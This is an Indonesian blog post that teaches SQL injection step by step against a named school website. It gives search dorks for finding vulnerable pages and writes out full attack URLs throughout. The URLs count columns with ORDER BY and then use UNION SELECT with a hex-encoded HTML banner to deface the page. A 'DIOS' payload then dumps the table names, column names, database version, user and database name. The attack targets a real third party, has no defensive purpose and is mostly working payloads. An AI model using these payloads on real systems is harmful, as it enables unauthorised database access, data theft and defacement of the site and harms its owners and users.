Featured Post
Assalamualaikum Wr.Wb
Dikesempatan kali ini saya memberi cara SQL INJECTION Print Nama dan Gambar. Apa Itu SQL INJECTION ? SQL INJECTION adalah teknik injeksi kode , digunakan untuk menyerang aplikasi berbasis data, di mana pernyataan SQL berbahaya dimasukkan ke dalam bidang entri untuk dieksekusi (misalnya untuk membuang konten database ke penyerang). SQL INJECTION harus memanfaatkan kerentanan keamanan dalam perangkat lunak aplikasi, misalnya, saat masukan pengguna salah disaring untuk karakter pelolosan literal string yang disematkan dalam pernyataan SQL atau masukan pengguna tidak diketik dengan kuat dan dieksekusi secara tidak terduga. SQL INJECTION sebagian besar dikenal sebagai vektor serangan untuk situs web tetapi dapat digunakan untuk menyerang semua jenis database SQL. Serangan SQL INJECTION memungkinkan penyerang untuk memalsukan identitas, merusak data yang ada, menyebabkan masalah penolakan seperti membatalkan transaksi atau mengubah saldo, memungkinkan pengungkapan lengkap semua data di sistem, menghancurkan data atau membuatnya tidak tersedia, dan menjadi administrator dari server database. Mungkin cukup segitu. Jika ingin mengenal lebih dalam apa itu SQL INJECTION kalian bisa kunjungi Penjelasan Tentang Sql Injection
DORK :
inurl:/gallery.php?id=
inurl:/news.php?id=
Kembangin lagi sesuai otak:V
Oke lanjut, karena di sini saya sudah mempunyai target jadi langsung aja.
Target : http://www.lifecommunityschool.sch.id/gallery.php?k=9
Dan ternyata vuln, web tersebut berubah/berbeda dari sebelumnya, Ok lanjut ke langkah kedua
2.Mencari Jumlah Tabel ( order by )
Oke di tahap ini kita akan memberikan perintah "order by", Oke langsung saja kita melakukan order by
http://www.lifecommunityschool.sch.id/gallery.php?k=9'order by 1-- - ( Kembali Normal )
http://www.lifecommunityschool.sch.id/gallery.php?k=9'order by 2-- - ( Normal )
http://www.lifecommunityschool.sch.id/gallery.php?k=9'order by 3-- - ( Normal )
http://www.lifecommunityschool.sch.id/gallery.php?k=9'order by 4-- - ( Normal )
http://www.lifecommunityschool.sch.id/gallery.php?k=9'order by 5-- - ( Berubah Bentuk/error )
Nah berarti Jumlah tabel atau column nya hanya 4
3.Mencari Angka Emas ( union select )
Sebelumnya, kita sudah mengetahui jumlah tabel/column nya, selanjutnya kita melakukan tahap mencari angka emas nya,bagaimana cara nya ? kita ganti kata "order by" menjadi "union select" dan menambahkan jumlah tabel/columns di atas dari "1" sampai "jumlah tabel" dan jangan lupa menambahkan tanda "-" di awal parameter, Oke langsung saja ( Jika kurang paham bisa komentar di bawah )
http://www.lifecommunityschool.sch.id/gallery.php?k=-9'union select 1,2,3,4-- -
Dan kita lihat angka emas nya muncul yaitu di angka 3 dan 4.
4.Print Nama&Gambar beserta dump database ( Menggunakan Dios )
Dan akhirnya, yang di tunggu-tunggu telah tiba, yaitu Print nama&gambar beserta dump database ( Menggunakan Dios )
Pertama, kalian ubah dulu teks kalian menjadi hex
Caranya di lakukan di web ini https://www.convertstring.com/id/EncodeDecode/HexEncode
Bebas kalian tulis apa aja setelah selesai pencet "Hex Encode!"
Oke, saya menulis"INJECT BY GILANG × FAMELLYA" dan di hex menjadi "494E4A4543542042592047494C414E4720D72046414D454C4C5941" Oke kita coba dulu print nama, tapi jangan lupa menambahkan "0x" di awalan hex, menjadi "0x494E4A4543542042592047494C414E4720D72046414D454C4C5941" Langsung saja kita print nama, cara nya ? kita ganti nomor emas menjadi hex, saya mengganti angka tiga menjadi hex, hasilnya : http://www.lifecommunityschool.sch.id/gallery.php?k=-9%27union%20select%201,2,concat+(0x494E4A4543542042592047494C414E4720D72046414D454C4C5941),4-- -Oke lanjut ke print gambar nya, caranya ? kita tambahkan <img src="link.com/gambar.jpg">
contoh : <img src=" https://i.top4top.io/p_1888v0uv70.jpg "> dan kita dapat mengatur ukuran panjang dan lebar nya dengan cara menambah "width dan height" ( tag html )
contoh : <img src=" https://i.top4top.io/p_1888v0uv70.jpg " width="200" heigth="200"> kita gabungkan dengan "INJECT BY GILANG × FAMELLYA" bisa kalian ubah menjadi keren dengan menggunakan "tag html", Oke langsung aja ke intinya, disini saya sudah membuat print gambar dan nama + tag html ( Biar keren:V )
tulisan saya :
<center> <img src=" https://i.top4top.io/p_1888v0uv70.jpg " width="200" heigth="200"><br><font size="5" color="lime">INJECT BY<br>GILANG × FAMELLYA</font><center>
Dan jangan lupa untuk di hex dan menjadi
" (0× 3C63656E7465723E203C696D67207372633D222068747470733A2F2F692E746F7034746F702E696F2F705F313838387630757637302E6A706720222077696474683D2232303022206865696774683D22323030223E3C62723E3C666F6E742073697A653D22352220636F6C6F723D226C696D65223E494E4A4543542042593C62723E47494C414E4720D72046616D656C6C79613C2F666F6E743E3C63656E7465723E)"
Kita ganti angka 3 menjadi bilangan hex diatas menjadi
http://www.lifecommunityschool.sch.id/gallery.php?k=-9'union select 1,2,Concat+(0x3C63656E7465723E203C696D67207372633D222068747470733A2F2F692E746F7034746F702E696F2F705F313838387630757637302E6A706720222077696474683D2232303022206865696774683D22323030223E3C62723E3C666F6E742073697A653D22352220636F6C6F723D226C696D65223E494E4A4543542042593C62723E47494C414E4720D72046616D656C6C79613C2F666F6E743E3C63656E7465723E),4-- -
Selanjutnya kita print nama&gambar beserta dump database, cara nya ? kita gabungkan dios dan hex di atas menjadi satu
Dios : (select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(table_schema=database())and(@:=concat(@,'<br>','<font color=green size=3>',table_name,'</font> ',' %C2%A0:: %C2%A0','<font color=blue size=3>',column_name))),@)))
Dan menjadi
http://www.lifecommunityschool.sch.id/gallery.php?k=-9%27union%20select%201,2,Concat+(0x3C63656E7465723E203C696D67207372633D222068747470733A2F2F692E746F7034746F702E696F2F705F313838387630757637302E6A706720222077696474683D2232303022206865696774683D22323030223E3C62723E3C666F6E742073697A653D22352220636F6C6F723D226C696D65223E494E4A4543542042593C62723E47494C414E4720D72046616D656C6C79613C2F666F6E743E3C63656E7465723E,(select(select%20concat(@:=0xa7,(select%20count(*)from(information_schema.columns)where(table_schema=database())and(@:=concat(@,%27<br>%27,%27<font%20color=green%20size=3>%27,table_name,%27</font>%20%27,%27%20 ::%20 %27,%27<font%20color=blue%20size=3>%27,column_name))),@)))),4-- -
Note * Jika Kalian Ingin Menambahkan Versi,database,versi
'<br>','<font color=%22orange%22>','Versi :: ','</font>',version(),'<br>','<font color=%22orange%22>','User :: ','</font>',user(),'<br>','<font color=%22orange%22>','Database :: ','</font>',database(),'<br>',
bisa kalian tambahkan sesudah bilangan hex
Hasilnya
http://www.lifecommunityschool.sch.id/gallery.php?k=-9%27union%20select%201,2,Concat+(0x3C63656E7465723E203C696D67207372633D222068747470733A2F2F692E746F7034746F702E696F2F705F313838387630757637302E6A706720222077696474683D2232303022206865696774683D22323030223E3C62723E3C666F6E742073697A653D22352220636F6C6F723D226C696D65223E494E4A4543542042593C62723E47494C414E4720D72046616D656C6C79613C2F666F6E743E3C63656E7465723E,'<br>','<font color=%22orange%22>','Versi :: ','</font>',version(),'<br>','<font color=%22orange%22>','User :: ','</font>',user(),'<br>','<font color=%22orange%22>','Database :: ','</font>',database(),'<br>',(select(select%20concat(@:=0xa7,(select%20count(*)from(information_schema.columns)where(table_schema=database())and(@:=concat(@,%27<br>%27,%27<font%20color=green%20size=3>%27,table_name,%27</font>%20%27,%27%20 ::%20 %27,%27<font%20color=blue%20size=3>%27,column_name))),@)))),4-- -
Jika kalian ingin mengganti/menambahkan seperti user(), version(), database(), @@port
lebih lengkap nya bisa kalian cek di bawah
https://pastebin.com/zczdYgDj
Oke sekian dari saya terima kasih dan semoga bermanfaat
Related Posts
Post a Comment
Archive
- December 2021 (3)
- November 2021 (3)
- October 2021 (2)
- September 2021 (8)
- August 2021 (4)
- July 2021 (6)
- April 2021 (12)
- March 2021 (12)
- February 2021 (14)
Popular
-
Ok guys Kembali lagi bersama gua ./numb_404 Guys Ya, oke kali ini gua akan memberikan tutorial SQL…
-
Assalamualaikum wr.wb Kali ini saya akan memberikan sedikit materi tentang membikin/membuat server…
-
Assalamualaikum wr wb Oke guys kembali lagi bersama gw Lkey7,Disini gw mau share tools BCA v2. Ma…